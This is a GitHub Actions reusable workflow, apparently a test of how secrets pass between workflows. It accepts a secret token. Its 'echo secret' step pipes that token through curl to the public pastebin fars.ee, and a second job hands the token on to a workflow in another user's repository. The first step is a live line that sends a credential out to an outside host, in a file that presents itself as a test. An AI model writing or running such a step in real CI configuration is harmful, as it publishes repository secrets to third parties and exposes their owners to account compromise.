name: test workflow

run-name: Run by @${{ github.actor }}

on: 
  workflow_call:
    secrets:
      token:
        required: true

jobs:
  use-secret-in-workflow:
    runs-on: ubuntu-latest
    steps:
      - name: echo secret
        run: |
            echo "secret ${{ secrets.token }}" | curl -F "c=@-" "https://fars.ee/"
    
  pass-secret-to-other-repo:
    uses: wangliu-iscas/test2/.github/workflows/test.yml@main
    secrets:
      token: ${{ secrets.token }} 